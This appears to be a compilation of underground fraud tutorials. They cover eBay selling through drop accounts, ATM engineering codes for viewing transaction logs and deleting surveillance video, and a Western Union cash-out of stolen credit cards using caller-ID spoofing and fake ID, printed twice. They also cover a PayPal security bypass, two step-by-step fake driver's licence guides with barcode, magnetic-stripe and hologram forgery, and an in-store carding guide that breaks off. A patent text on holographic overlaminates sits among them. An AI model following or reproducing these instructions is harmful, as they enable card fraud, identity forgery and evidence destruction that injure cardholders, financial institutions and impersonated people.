try to take some money from him – but trust me, It’s not good idea. +Also posting s lot of lots at once to speed the promotion is not a good idea, It will have success in case of +not popular and cheap stuff, but anyway buyers first look at the last feedbacks and lors which was bought +for them. +Selling from fresh accounts. +Before you’re going to sell something, you should find the drop or yourself who will accept payments +from buyers on his name and address. That’s why before lot posting you should change the info about +account’s holder with telephone or without. After this you can post a lot. + +Engineering codes of ATMs +Engineering codes of ATMs +The engineering codes of ATMs +The engineering codes are used to operetivnogo repair and adjustment of ATMs. +For the most part and are used in old and new ATMs Japanese (brand not specified), the difference is only +the immediate combination of signs +inzh.koda. +What can I do with inzh.koda with the ATM. Opportunities well finite but quite large. +Inzh.kodami you can: +1. View and delete video recording service ATMs. +2. Prosmoret amount and the Number of banknotes in the cells. +3. Log of the operations and their keyboard kits +4. Technical settings, network settings and connections for ATM connected to the Internet or LAN. +There are three types of ATMs using inzh.kody. +Type 1 - the engineering uses a special card and pincode. +TYPE2 - Using flash keys, or e-i-key. +TYPE3 - uses direct keyboard teh.dostup. +Codes for ATMs third type: +Hold the press 071ili # 077. There is an inscription "Pin enter", the default 9999. +Next appears "Serva enter". +Type: +0012 * - Indicates the log operetsy. +It looks like this: +1SLR # 123456789012341234567890 ....# +2SLR # 123456789012341234567890 ....# +3SLR # 123456789012341234567890 ....# +and so on ... +The first 10 digit code operation, the following 4 numbers - PIN card on account number to withdraw an +amount of banknotes issued by the codes and their Number. +Exit menu #. +0026 * - Displays the list videos. +It looks like this: +VLP/00/00/00 /: 01 # 1234567890 +VLP/00/00/00 /: 02 # 1234567890 +VLP/00/00/00 /: 03 # 1234567890 +and so on .... +It's all clear / date / month / year /: serial number # opcode +To udalti kakyu any record, select it from the list and press the reset button "C". +To view what an entry (if the ATM supports video viewing), select it from the list and press "*". +Exit menu #. +0603 * - Indicates the status of safe and yacheik Number of cuts in them. +It looks like this: +FF: A1: 1000/100 +FF: A2: 1000/020 +FF: A3: 1000/010 +and so on .... +If the front stated "AA" means that the cell is faulty or disabled. + +Empty or unused cell is denoted "RFF". +Exit menu #. +0099 * - Indicates the system number of the ATM, the identifier of the bank statement, date of last +update, the protocol of the changes. +Output from the engineering menu # # # 0 with shutting down the ATM, # # # 1 with the inclusion. +__________________ +Ihack Post +Getting Cash from a CC using Western Union +You are going to need the following tools before you go to westernunion.com and transfer money. +1. A complete Background Check of the card holder +This is because if you are going to try and transfer anything over $100 dollars USD they will ask you +various questions such as your previous address, Social security number, Date of birth, Mothers maiden +name, what your middle name is, what bank issued you your credit card, etc. In order to get that kind of +infomation you will need to go to a site like peoplefinders.com and it costs about $60 for the infomation +you might need for western union. +2. Phone spoofer/voice changer +You will need this because western union will think you are a fraudster if you arent calling from the card +holders phone number so you must use a phone spoofer service to make the caller id at western union +come up with the card holders phone number. Basically trick western union into thinking your calling +from the card holders house. The voice changer comes with the phone spoofer service and you need this +obviously so your own voice isnt being recorded incase of an investication and also if your a male and +your using a females cc to get money from wu you will want to change your voice to sound like a female. +3. Call fowarding service +This is something you will need because the phone spoofing service blocks 1800 numbers or any toll free +phone number. You can only dial 10 digit numbers with phone spoofers so you have to get a call +fowarding service so when you call the 10 digit number from the call forwarding service it will foward to +western union. +4. Internet phone service +If you are located in europe this is a must because it will cost you too much to use the spoofer and call +fowarding service and it is also not traceable. I personally use my pre-paid cell phone but i'm located in +the USA. +After you have got that stuff all set up the first thing you need to do is make sure the call fowarding works +and the spoofer works and comes up with whatever number you put in for the caller id. When you finally +have that all set up and you have your background check all set up then you go to westernunion.com and +make the transfer. After you make the transfer it will most likely say something to the affect "Transfer on +hold, Please call Western Union to confirm" or something to that effect and you call them up with the + +caller id/spoofer and call fowarding service. n00b's to this may have some problems and might not be able +to pull this off the first 10-15 times but you will get the hang of it like I did. I have done about 13 +transfers and only had maybe 6 actually go though for pickup. Another thing you should get is a fake id +because that will be the only way to link back to the fraudster in an investication. If you have a fake id +and use it to pickup money you will most likely not get caught or it will be very hard to track you down. +Remember that you may not be successful your first few times but keep trying and when you do get a +successful transfer you will be really happy. Some things I would like to point out is that first check and +make sure the card your going to use is valid, I personally use yahoo wallet to verify the cc before I even +think of using it. Also, to get spoofing service for caller id/voice changer I use spoofcard.com and for the +call fowarding service I use is accessline.com +You are going to need the following tools before you go to westernunion.com and transfer +money. +1. A complete Background Check of the card holder +This is because if you are going to try and transfer anything over $100 dollars USD they will +ask you various questions such as your previous address, Social security number, Date of +birth, Mothers maiden name, what your middle name is, what bank issued you your credit +card, etc. In order to get that kind of infomation you will need to go to a site like +peoplefinders.com and it costs about $60 for the infomation you might need for western +union. +2. Phone spoofer/voice changer +You will need this because western union will think you are a fraudster if you arent calling +from the card holders phone number so you must use a phone spoofer service to make the +caller id at western union come up with the card holders phone number. Basically trick +western union into thinking your calling from the card holders house. The voice changer +comes with the phone spoofer service and you need this obviously so your own voice isnt +being recorded incase of an investication and also if your a male and your using a females cc +to get money from wu you will want to change your voice to sound like a female. +3. Call fowarding service +This is something you will need because the phone spoofing service blocks 1800 numbers or +any toll free phone number. You can only dial 10 digit numbers with phone spoofers so you +have to get a call fowarding service so when you call the 10 digit number from the call +forwarding service it will foward to western union. +4. Internet phone service +If you are located in europe this is a must because it will cost you too much to use the spoofer +and call fowarding service and it is also not traceable. I personally use my pre-paid cell phone +but i'm located in the USA. +After you have got that stuff all set up the first thing you need to do is make sure the call +fowarding works and the spoofer works and comes up with whatever number you put in for +the caller id. When you finally have that all set up and you have your background check all set +up then you go to westernunion.com and make the transfer. After you make the transfer it will +most likely say something to the affect "Transfer on hold, Please call Western Union to +confirm" or something to that effect and you call them up with the caller id/spoofer and call +fowarding service. n00b's to this may have some problems and might not be able to pull this +off the first 10-15 times but you will get the hang of it like I did. I have done about 13 +transfers and only had maybe 6 actually go though for pickup. Another thing you should get is + +a fake id because that will be the only way to link back to the fraudster in an investication. If +you have a fake id and use it to pickup money you will most likely not get caught or it will be +very hard to track you down. +Remember that you may not be successful your first few times but keep trying and when you +do get a successful transfer you will be really happy. Some things I would like to point out is +that first check and make sure the card your going to use is valid, I personally use yahoo +wallet to verify the cc before I even think of using it. Also, to get spoofing service for caller +id/voice changer I use spoofcard.com and for the call fowarding service I use is +accessline.com +Holographic Overlaminate +The present invention includes a process that prints a clear layer or layers over a YMCK composite +printer layer on an identification card by using the overlayers as a printable surface. These overlayer +panels (OP) are known in dye sublimation printing. They are typically used to protect the dyes that have +been sublimated into a substrate from UV degradation. Because the OP has an UV blocking component +which causes the OP layer to fluoresce in UV light, when a pattern printed in the OP layer is bathed in +UV light, the entire printed pattern (whether a logo, writing or other computer generated design) will +fluoresce. Different OP layers have different formations for UV protection. Ribbons with OP layers are +available from Dai Nippon of Tokyo, Japan have characteristics ranging from brightly fluorescent to +absorbent. Combining more than one OP layer would give the fluorescing printing changes in intensity +and hue. +If the OP layer or layers are used for printing images rather than laid down on the identification card as a +full sheet, the sublimated dye not covered by the image would be unprotected against UV degradation. +Since the OP layers themselves are very thin, even with the OP layer being laid down on the card as a full +sheet, the durability of the image is problematic. Additional overlaminate material can be laminated onto +the card, increasing the durability and longevity of the card. This second overlaminate material can be the +holographic material or clear material such as PolyGuard (sold by FARGO Electronics, Inc. of Eden +Prairie, Minn.). +If the OP layer is printed over the dye or resin, it does not sublimate into the card but sits on top of the +card. When the second overlaminate material is laminated on top of the image printed on the OP layer, a +series of ridges with refracting angles are created by the printed image of the OP layer underneath the +second overlaminate. By modulating the printed pattern at a high frequency, this process can create +something similar to a diffractive grating where sharp angles are embossed into the reflective surface to +create more refractive angles to refract light. In one form, the process causes the printed edges to refract +the light so that angling the card from a light source will bring the outline of the clear printed image into +view when the angle of the refracted light aligns with the viewer. +When more printed OP layers are used, then one OP layer can be used to protect the YMCK dye printing +and the additional OP layer can be used for security imaging. By putting more OP layers on the card, +especially when the OP layers have different refractive properties or different UV absorbing or +fluorescing properties, additional security features can be devised. +The overlaminate, which is laminated onto the identification card in a second step, can be scored by the +laminating print head of the identification card printer. This scoring would take the form of reflectively +compatible angle grooves. Each groove further enhances the OP layer's refractive properties, creating a +diffraction grating like image to appear as the card is moved away from a horizontal plane and light + +reflects accordingly. +The diffraction grating type image which previously had to be embossed into the overlaminates now can +be simulated by printing the OP layers and using the second overlaminate which will reduce costs, time to +manufacture, and enable accurate targeting of the image. In addition, if the printed overlaminate is +modulated by either printing or special overlaminate manufacturing, more reflective edges are created to +enhance the security image. +Identification card ribbons (FIG. 1) consist of a series of panels (in the case of FIG. 1, consisting of +yellow dye (1), cyan dye (2), magenta dye (3), black resin or black dye (4), and a clear overlaminate (5) +thus being known as a "YMCKO" ribbon, each of which are coated with dye sublimation ink or resin ink. +Each ribbon can be configured with different ink panels depending on the specifications desired. Thus, +the ribbon in FIG. 1 could eliminate the black resin panel, thus becoming a "YMCO" ribbon, or the +overlaminate could be eliminated, thus becoming a "YMCK" ribbon. All combinations of ribbons that are +able to print in full color require the yellow, cyan, and magenta panels. The ribbons are rolled onto +circular cores (6) which fit into the printer. The ribbon is situated between the print head and the blank +identification card. The printer then receives instructions from a computer that is connected to printer as +to the digital images and heating instructions to heat the print head to place such images onto the +identification card (7) (FIG. 2). +FIG. 3 shows the carrier ribbon ( and the overlaminate material (9). The overlaminate material is designed +so that it would completely cover an identification card when heat from the print head is applied to the +entire overlaminate material. The overlaminate has a laminating material coated on the exposed side +(which is face down when run through the printing process) of the laminate. When heat is applied, this +coating material bonds the lamination material and the identification card together. +FIG. 5 shows the process of laminating. The ribbon core (6) has been mounted onto the core holder (12) +and the ribbon (13) has been pulled through the print head mounting assembly (14) and is pinched +between the print head (15) and the identification card (7), which is held tightly by a pinch roller (16). +The used ribbon is re-wrapped around a take up roll (not shown). The identification card is fed into the +printer by a series of pinch rollers (17) from an input hopper (not shown). The identification card (7) +moves with the ribbon panel, and then is pulled in the reverse direction from which it was fed to have the +next panel printed upon it. Thus the card moves forward and backwards depending upon its location and +the ribbon panel location. The pinch rollers are capable of moving bi-directionally while the print head +and print head mechanism remain stationary. Once printed and laminated, the identification card is moved +from the print head area by a series of pinch rollers (18). +In FIGS. 4A through 4D, the results of the bonding can be seen. The identification card (7) has been +printed on, and the overlaminate layer (9) has been applied over the full length and width of the +identification card. FIG. 4B is a cross-section of the bonded identification card (7). The overlaminate (9) +cove's the entire width of the identification card. If the cross-section was lengthwise rather than through +the width of the card, the overlaminate would stretch the entire length of the card. The clear feature of the +overlaminate allows the printing on the card to be completely visible. The dye sublimation (10) have +sublimated into the card, remaining below the surface of the identification card (11) so that the surface is +still flat until the overlayer is applied. When and where the overlayer is applied, the card's thickness is +increased. Resin ink sits on top of the surface and also provides ridges. +The overlayer can be supplemented with an additional lamination at a separate station. Identification card +printers such as the Cheetah II or the Pro-L (available from Fargo Electronics, Inc. of Eden Prairie, +Minn.) incorporate a second lamination station for an overlaminate that is thicker and more durable than +the overlaminate layer applied at the printing station. This thicker and more durable overlaminate such as +PolyGuard sold by FARGO is on a separate roll from the YMCKO ribbon. These overlaminates are +suitable for having a holographic type image embossed therein. In FIG. 4C, the results of applying the +thicker overlaminate can be seen. The identification card (7) has the sublimated dyes or resins (10) which +have become part of the card. The overlaminate layer (9) has been laid down in a full sheet to cover the +entire card, and the thicker overlaminate layer (19) has been laminated on top of the first overlaminate to + +create a sandwich effect. +In FIG. 6, the overlayer panel (9) is printed on (20), rather than being laid down as a full sheet. The +printed image can be any graphic image created on a computer FIG. 4D shows the cross-section of the +card (7) with the overlayer (20) being printed as a clear printed layer rather than as an unbroken sheet. +When the thicker overlayer (19) is applied in FIG. 4E, the effect is to create ridges on the thicker +overlaminate sheet rather than a smooth surface as was shown in FIG. 4C. When these ridges are created, +light reflects from the edges of the underlying overlaminate (20) creating a ghosting image when the card +is moved from a horizontal plane. +In some cases, application of the overlaminate is not a viable option because of the cost of the +overlaminate and the price of the printer required to laminate the card. In that case, a similar methodology +can be utilized that achieves a similar result. In FIG. 6, the overlay materials is laid down as a first pass, +with the heavier overlaminate materials being applied in the second operation, utilizing a hot roller. To +achieve a similar result, the first thin overlaminate is applied in reverse, i.e., the entire overlaminate panel +is applied except for the image. Instead of a raised surface on the card, the image is actually lower than +the overlay material on the card. The ridges that are created are inverted, sot hat the eye can still see the +image, since the image is the area where the overlay was not printed. Since there is no overlaminate +coating in this embodiment, the image can be seen, otherwise the application of the second, heavier +overlaminate would cover and fill in the nonprinted area. Since the non printed area has no protection +from UV rays, over time the image (as this is the non printed area) will appear since the dye sublimation +inks will fade from exposure to UV light. +Although the present invention has been described with reference to preferred embodiments, workers +skilled in the art will recognize that changes may be made in form and detail without departing from the +spirit and scope of the invention. For example, other types of overlaminate, over lamination techniques, or +techniques for creating ridges in an overlaminate layer can be sued when implementing the present +invention. For simplicity, a preferred species is disclosed. However, the invention includes the gnus and +the invention should not be limited to any particular species when interpreting broad steps or elements of +the invention. +How to Bypass Paypal Security Measures +This gets asked alot, I do believe this still works and hope this helps you in anyway, if this tut is +crap/useless/dont work, ill close it +Step One: +Go to your browser open http://Www.Paypal.com +Step Two: Type in the login information for your paypal account you will be using for teh bypass. +Step Three: Kay when your logged in and you get that shitty paypal security message all you do is click +""help" or "security center." They both work usually, sometimes one doesn't work and one does. If one +dont work log out and try agian + +Step Four: Do not click "My account" or anything else. Only navigate to "send money" or "request +money." +Step Five +You're now in the account. Do not send money to your personal account. It will work, but it will cause +both paypals to be limited.(Like I said before this account was for show purposes only and was intended +to be limited.) +Hope it works ^^. +How To Make A Perfect Teslin ID +How To Make A Perfect Teslin ID, Tutorial #1 : +Chapter 1 - Items/Supplies Needed +Chapter 2 v Templates/Editing +Chapter 3 - Printing +Chapter 4 - Laminating +Chapter 5 - Finishing Touches +Chapter 1 - Items/Supplies Needed +Many supplies are needed in order to create a valid real looking license. Let's first begin with the basic +supplies needed. You will first you need to get an exacto knife, I prefer the ones with the rubber handles, +makes it easier on the hand when you are cutting the teslin. Scissors, a nice clean, sharp pair works +perfectly fine. The kind that your teacher never let you use in elementary school is the best one to use. +Sandpaper, will also be needed, 1000 and 1500 grit is suggested. A cutting board, this comes in handy +when you don't want to leave slice marks in on a desktop +(http://www.brainstormidsupply.com). Laminator, this one I will go into detail about. Choosing the right +laminator is very important, personally I prefer the GBC 40, which can be purchased at Office Max, for +$49.99. It's cheap but it does get the job done right, and surprisingly it keeps the id held together through +3 times washed. The preferred laminator by many id makers is anyone with a temperature control, the +better control you have over the heat, the better the lamination is going to be. A carrier, which is a guide +for the id to sit in so your rolls on the laminator don-t get messed up. A few index cards, just the size that +will fit through the laminator. +Now we move onto one of the biggest parts, PRINTERS. Printing with a HP 620C, will definitely not do +the job and your id will look like a 5 year old made it. Preferably use an Epson C80, or any Epson line. If +you don't have an Epson or can't get your hands on one, any HP 900 Series will do the job right. Teslin, +the oilpaper in which you will be printing the templates onto, can be ordered online. + +http://www.brainstormidsupply.com - Recommended place to buy teslin. If you have an inkjet printer, +order inkjet teslin, and so on with laser. Believe it or not there is a difference between the two. +Hologram's, you can either order these or make them yourself. In tutorial #2, I will go into detail on how +to make precise holograms, but in this one, I suggest just ordering from a trusted site, Digital Rebellion +usually has reviews and so does #fakeid and #identification on Dalnet. Camera, a digital camera one with +at least 2.1 mega pixels, is recommended, any less and the quality decreases. Kodak makes nice cameras +to use in this instance; I personally own one and my pictures have come out perfect. +Chapter 2 v Templates/Editing +Templates, are one of the biggest parts of the id making process, shitty templates equal shitty ids. Usually +people on Digital are willing to trade or pass a quality template on to you. Making your own template is +another possibility, but it takes much skill, time and patience. Something not a lot of people obtain, so if +you-re a beginner, stick with the pre-made templates. A good template ranges from any from sizes of 50 v +90 megabytes. Now, mostly all templates come in a .PSD file, for those of you who are new, it-s an +Adobe Photoshop image. Designers do this because they can fit many layers into one file, and the layers +are editable, making it easy to re-enter information. Some knowledge of the program is needed but not +necessary, you can read their free tutorials. Photoshop itself costs in excess of $500, but it is possible to +find someone with a spare copy. +Well, now that you got your template that you want to use, we are ready to begin. First, the photo that you +will be taking needs to be at least a foot to two feet away from the person. Lighting doesn’t really matter; +just make sure it is enough to see. Take the picture on a white clear wall, this allows for easier editing of +the photo. Once, the photo has been taken, we now move onto to the editing phase of the photo. You will +need to replace the background on the picture with one of a light blue, my suggestion, is copy the blue +from the picture blue on your template. This is where the skill comes in, you have to make the photo look +believable, or otherwise, it-s going to be crap. Make sure you get rid of all white effects all around the +hair, neck, and shoulders. After replacing the background is complete, you will then need to add some +form of lighting effect to the picture to help intensify, and make it look more believable. My choice in +lighting in Photoshop, is Filter>Render>Lighting Effects. Adjust the circle around the picture, so there is +more light exposure. Switch light type to Omni Light, Intensity and Exposure levels need to be adjusted. +You decide on the levels you want to use, I personally like to use Intensity v 18, Exposure v 13. But once +again this is an option that varies from picture to picture. How the picture is taken, what kind of camera, +you get the general idea. +Next we move to the cutting stage, you will need to cut the picture from about a half an inch above the +head to right below the shoulders. Basically take a look at your real license and try and follow how that +looks. Upon cutting it you will need to resize and possibly upsize or downsize to fit the borders in which +the picture is suppose to go. This can take some time to get it perfect, but the better it looks the better it +will work. After completing the first picture on the left, we will move to the second picture on the right. +Downsize this one a lot to fit the borders, after resizing the second picture, you will need to make the +opacity 40%. This will make the picture look faded to an extent that is needed. +Editing the license should be fairly easy. Basically all you will have to do is change the information +around to fit the needs of the person in whom your making it for. The license number really doesn’t +matter, not like in Michigan or some others states where the first letter is the letter of your last name. I use +B to start the license number. Another suggestion that is very helpful and usually works for me is to go to +www.whitepages.com and search for someone with the last name that you-re making the id for. This will +give you a street address, city, and zip. It-s very helpful, when you do not know many cities in which you +are making the id for. On the bottom of the id are a bunch of numbers and letters and, those are just to tell +where the picture was taken and the id was made. Now, there are two ways to do the signature on the id, +one is to have a person sign a piece of paper, then scan it, size it down and import it into the template +(recommended way). The second way is to download a signature font, and then just type it in. In my +opinion it looks fake. + +First, we must edit the back of the template of the id. Try and download a CA Barcode program, it allows +you to enter the expiration date and the drivers license number of the person and it will make you the bar +code for the back. Copy the picture to the clipboard; now import it onto the id. If you don-t have this +program or can-t find it don-t worry. +Chapter 3 v Printing +Printing is one of the most complicated parts of making the id in my opinion. Everything must be +perfectly aligned right and set up in order to create a believable looking id. You will first need to print out +a black and white copy of the id on a piece of white paper. After printing out the black and white copy, +you will then need to cut a strip of teslin to fit over the area in which you printed on. After cutting the +piece of teslin, tape the corners of the teslin down. Put the paper back in the printer and then before +printing set the DPI to the highest setting and the best quality printing. It is also recommended that you +change the paper setting to photo quality. The paper will come out, I suggest putting it in front of a fan to +let it dry quicker. Leave it there for about a minute or so. After, drying off comes a very difficult part +lining up the teslin with the print previous to it. You must be sure to exactly line up the teslin with then +picture on the paper. My suggestion is to put the paper and the teslin in front of a light and have someone +tape the corners down for you. After taping the corners put the paper back into the printer, we will now be +moving on to the back of the id. Now, print to the back of the teslin, you should be printing at the same +resolutions as was before. Pull it out of the printer and put it in front of the fan for another minute. And +now we-re ready to move to the next stage of the process. +Chapter 4 v Laminating +Laminating is one of the biggest parts too of the id process, it includes much time and patience trying to +make sure everything is aligned properly. Otherwise, you just wasted a piece of teslin and a perfectly +good hologram. Now, take your hologram and separate the top and the bottom. Take a rag and just get it a +little wet, and wipe down both the top and bottom parts of the hologram. After that set it in front of the +fan and let it dry off. After it gets dry, set the top half of the hologram on the front side of the teslin. Now +make sure it is aligned evenly and that that it-s equal distance all around the id. Now, tape three sides, the +top, bottom, and the left side. Turn on the laminator; once the ready light comes on we-re ready to begin. +After taping is complete, put the id in the carrier, then put the side that is not taped in the laminator +slightly, just enough so that it doesn’t go through but laminates the one side. Now, pull it out, remove the +tape, and run the id back through the laminator. This ensures that the id will not move from the current +position that it is in. Making your id almost perfectly done. After the front, it laminated, put it again in +front of a fan and let it cool down. Once, it is done, take it and put in on a hard surface or your cutting +board and take out the exacto knife and start cutting the teslin away. Making sure not to leave any borders +on the id. This will ensure less work later on in the process. Now, take the back part of the id, and align it +evenly, and tape three corners once again. Put, the one side that isn’t tape slightly into the laminator, once +complete, take it out. Remove all the tape and run the id back through the laminator. Now, your id is fully +laminated and we-re ready to move to the last stage. +Chapter 5 v Finishing Touches +Your probably thinking, finally, we-re here, but the work isn’t all over yet. Take out the sandpaper 1000 +or 1500 grit. Now, corner off the corners better, making sure that they are smooth and there is no hard +spots. Give the edges a nice sand to making sure that when you rub your finger on the corners and edges +it feels good. After completing this, take out the 1000 or 1500 grit sandpaper, and in a circular motion +sand the front of the id. We are doing this to try to get rid of some of the gloss on the id. The less glossy +the better it will turn out. Another way is to sand a little bit on the front with 1000 or 1500 grit, then take +the id, go outside and run the shit in the dirt for a little bit, same for the back, Then take two dirty ass +cards and put your id between them in your wallet. Leave it there for a day or two. Now, after sanding, +check the corners and make sure there are no breaks in the laminate. Try to do a bend test on it, which is + +taking it length wise, and bending it slightly, if anything pops, run it back through the laminator. If not, +you did a good job. But still give it a run through the laminator with lots of pressure. Put a few index +cards above and below the carrier, and give it one finally run through. And now, your ID is complete. +Congratulations! +How to make great fake ID +1. Obtain necessary supplies from one of the following websites: +http://www.arcadiaid.com +http://www.poisonid.com +http://www.idsupplystore.com +2. Find and edit the templates +Search a Peer-2-Peer network such as Kazaa, LimeWire or BitTorrent to find a template. By using Adobe +Photoshop or Macromedia Fireworks, or a free program like GIMP, you should easily be able to edit the +templates. +3. You should begin editing by changing the text fields. Most standard IDs use the font Arial that comes +with Windows but if you wish to use specialty fonts that do not come with Windows (such as a font for +signatures) you can see how to download and install them by reading this article: Install Fonts On Your +PC. +Edit the eye and hair color fields as follows: +Eye Color- Indicate eye color abbreviation: +BLK - Black +GRY - Gray +MAR - Maroon +BLU - Blue +GRN – Green +PNK - Pink +BRO – Brown +HAZ - Hazel +MUL – Multicolor +Hair Color- Indicate hair color abbreviation: +BAL – Bald +BRO – Brown +SDY - Sandy +BLK - Black +GRY - Gray +WHI - White +BLN – Blonde +RED – Red +Also, if your ID has restrictions or endorsements here are the codes. Some are rarely used but others, like +restriction code B are quite common. Here are a list of some of the more popular codes: +Restriction codes: +A - No Restriction +B - Corrective Lens +C - Mechanical Aids +D - Business Only + +G - Daylight Only +H - Employer's Vehicle Only +J - Prosthetic Aid +Q - No Passengers +R - motorcycles 500 cc & under +S - to & From School +T - To & From Medical +U - all motorcycles except Class X +2 - Personal Vehicles Only +Endorsement codes are less common but include: +M - Motorcycle endorsement for any motorcycle regardless of engine displacement. +P - Passenger vehicles designed to carry 16 or more persons, including the driver. +T - Double/triple trailers allowed. +Y - Farm endorsement (Class A). +4. Then, scan in the photo and signature image files +You need to scan in a passport photo or other acceptable ID picture. Also scan in a signature. If the +background of the passport photo does not match the background of the state id, you will need to do some +editing. +5. After scanning the passport photo into the computer, the person's face will need to be separated from +the background so it flows seamlessly with your ID card template. Using a program such as Adobe +Photoshop, Macromedia Fireworks, or GIMP, provides you with an image editing tool called "Magic +Wand". This tool will allow you to click a color in the image and it will select all surrounding colors that +are similar or the same. There will be a slider that will allow you to select the amount of variance from +the color you select. The higher the variance relates to more of the image that will be selected. Once the +background is nearly fully selected without containing any of the person's face, press 'Delete' on your +keyboard to erase it. You can then magnify the image and use the eraser tool to clean up around the +person's face. At this point, zoom out and copy the image. It can be pasted onto your ID card template. It +will then flow seamlessly into your template design and you can choose any background color you want! +For more detailed instructions on how to edit facial images for use on id cards, see this article: Edit Face +Images for Use on a Fake ID. +6. Then, add a Barcode +The unusual-looking scrambled barcode on the back of most driver’s licenses is known as a PDF417 +barcode. This barcode contains most of the information contained on the front of the license. By editing +this readout, you can encode your information into this barcode. You can generate these barcodes by +finding a free PDF417 Generator online. Below is the general sequence. +ANSI 6360263f02DL20393504EM02460010DLDAQ1414556 +DAASMITH,JOHN,A +DABSMITH +DACJOHN +DADA +DAG423WILSON +DAIMIAMI +DAJFL +DAK044 +DBB190922 +DBA2480922 +DAU511 +DAW170 +DAZBR +DAYBLU +DBC2 +DBHN +DARC +DBD200684003 + +DASB +DBE1 +DBIN +EMEMEWPFD +7. Add a Magnetic Stripe +If your license requires a magnetic stripe and you want it to be scannable, it can be encoded with an +encoder. Generally these are very expensive and are difficult to find. However, you can get the EasyIDea +Magnetic Stripe Encoder for less than $400 bucks. There are two types of magnetic stripes, HiCo and +LoCo. HiCo and LoCo magnetic differ in that HiCo are much more difficult to demagnetize. The +encoders for these typically were much more expensive than for LoCo. Most HiCo encoders encode +LoCo stripes as well. The best way to program the stripe is to decode a working driver’s license, edit the +data, and then program it back onto the stripe. Encode the magnetic stripe after the card is finished. +8. After editing is done, you can start printing +You will need to print on a synthetic paper. There are two types of synthetic paper that are nearly the +same. Teslin and Artisyn paper are single layer, silica-filled, polyolefin printing substrate with unique +microporous and temperature resistance features that make it the product of choice for laminated ID +badges. Teslin is more expensive than Artisyn and much less versatile. If you want to use a desktop inkjet +printer, you will achieve better results with Artisyn or Artisyn NanoExtreme™ synthetic paper. Printing +on Teslin with an inkjet does not work well and tends to look grainy and smear. The Artisyn and Artisyn +NanoExtreme™ are coated with chemicals to absorb the ink effectively. It is cheaper than Teslin, works +well with all types of printers including inkjet and laser printers. It also tends to produce better print +quality results. Teslin can be found at PoisonID.com and Artisyn can be found at ArcadiaID.com. Arcadia +also sells perforated sheets that punch out in the size of the ID cards. +9. The next step is to select your printer. The preferred method is to use a pigmented based inkjet printer +like an Epson printer with DuraBrite ink. This tends to produce incredible results and works well with +Teslin even though it is not a laser printer. Better results are still achieved on Artisyn paper, and for the +highest quality results Artisyn NanoExtreme™ should be used. If a pigmented ink printer is not available, +a laser printer is still a good result. Laser printers produce sharp and clear results, but the ink tends to look +waxy. Lastly, any dye-based inkjet printer will work fine. A dye-based inkjet printer is that standard color +printer that most people have in their home. Again, if you use dye-based inks make sure to use Artisyn. +You should print on highest quality photo settings. +Print on one sheet of paper, both front and back. +10. Then, the next step is cutting. +If you are using EasyIDea Microperforated Artisyn, you can skip this tedious step. Otherwise, start by +cutting out the ID from the paper. Tracing the dimensions of the ID using a butterfly pouch is generally +helpful. A paper cutter or X-Acto knife is also helpful. After cutting sheets by hand for a while, I decided +I’d rather use the punch-outs from http://www.arcadiaid.com +11. Then you will need to laminate. +You must use thermal laminating in order to bond the butterfly pouch to the synthetic paper. Once +laminated, the card will harden and resemble a PVC card. You must use a thermal (heat) pouch laminator. +Avery, Arcadia EasyIDea, or GBC makes good ones that run around $50. If you can't afford a laminator +then you can use a standard home iron. This is a little more tricky as you have to make sure the iron +doesn't get so hot that it melts the laminate plastic but is still hot enough to bond the laminate to your ID. +Also be sure the iron does not have any water loaded into it as this could damage the ink on the pre- +laminated ID and the steam could warp the ID card. +12. Next, place the insert into the butterfly pouch. You must place the card into a carrier. Run the carrier +through the laminator. Immediately following lamination, it is helpful to place the card under something +flat like a book so that it cools flat. +13. Then, apply a hologram. +Generally, it is acceptable to use a generic hologram. Very few people actually examine the hologram and +read what it says on it. I have had my fake for over two years with a generic hologram on it and I have +never had a problem. If you’re concerned about making something that looks truly authentic, there are +other methods to replicate holograms. The Shield and Key hologram is the most commonly used generic +hologram and is a transparent rainbow hologram. This means that it looks transparent when looked at +directly but when tilted to the sides the hologram lets off a rainbow spectrum. This is my generic + +hologram of choice when making fakes. This type of hologram is pretty much impossible to duplicate +using the Pearl-Ex method below. +14. Making a Hologram +The gold holograms on many ID cards are called binary holograms. These holograms can be easily +reproduced using Pearl-Ex paint and Photo-EZ paper. +This product is for making stencils. A stencil is basically the outline of a picture with the negative part +missing. To make the stencil you scan the hologram off your id, then convert it to an all black image. +Next you print the image on a transparency. A transparency is a transparent sheet of plastic meant for +inkjet printers or lasers. Then you take the transparency and tape it to the Photo-EZ. You put it out in the +sun and all the areas of the material not covered by the black negative of the holo cures. When washed the +part covered by the negative washes away, leaving you with your stencil. You will want to order the high +resolution material. This product can be ordered from cBridgeand more information can be found there. +As for the painting material, the two main ones are Interference Gold (Fine) made by Golden Acrylics +and PERL-EX DUOTONE. The latter of the materials work best because of the fact it reflects two colors +of the spectrum. Perl-Ex comes as a powder and preparation is needed. These paints are transparent when +viewed from straight on. When viewed from different angles you see different colors depending on the +particular colors of the paint. Perl-Ex comes in Duo Red-Blue, Duo Blue-Green, and Duo Green-Yellow. +Perl-Ex is available in a lot of places here is one: http://www.sierra-enterprises.com/pearlex.htm +You have to buy a Transparent Base made for paints to prepare the Perl-Ex. A good one is Speedball +Transparent Base. You mix in a 1:50 ratio. 1 part Per- 50 parts base. If you are using Golden acrylics then +you use a 5:1 ratio. 5 parts paint 1 part base. When applying the paint in the stencil, you should use if +possible one of those brushes made for screen printing. It is like a pencil but with a flexible tip. A sponge +can be used but extra care needs to be taken when applying. You want to apply a very thin amount and +practice will be needed to get it right. +On a lot of the new ID's there is a multicolored hologram that reflects the full spectrum (like a rainbow). +This is especially true of most of the Canadian ids. What you do is pick the two most dominant colors and +buy the matching Perl Ex colors. This will be good enough to reproduce the holo. The holo can be put +directly on the finished ID or before lamination on the inside of the pouch. If you choice is the inside then +remember to put it in the reverse. +15. Then, you’re ready for the finishing touches. +It is recommended that you sand the edges of the hologram with a very fine grit sandpaper. This removes +the jagged edges of the synthetic paper. You should lightly sand the front and back of the id to give it a +more worn look. +16. Lastly, these instructions were to make a 30 mil drivers license that resembles a PVC card. If you +want to make something thinner that bends corner to corner like some ID cards, you can remove the front +part of the butterfly pouch and simply laminate the back of the pouch with the synthetic paper. Many +machines use this method, but it can be accomplished manually. You can also replicate signature strips by +scratching the surface of the butterfly pouch with sandpaper. +17. Have fun and don’t be an idiot with your ID. +Inshop Carding TUT +I figured it was about time all you noobs and not so new noobs got some fresh advice to help you out +there in the world of instore carding. I mean half these tut's use names I haven't seen since SC and +CP.So,here goes. All the obvious shit has been beat to death and if your too lazy to read it again. Here it is + +Don't shit where you sleep--NEVER card anywhere near your hometown! +Dress the 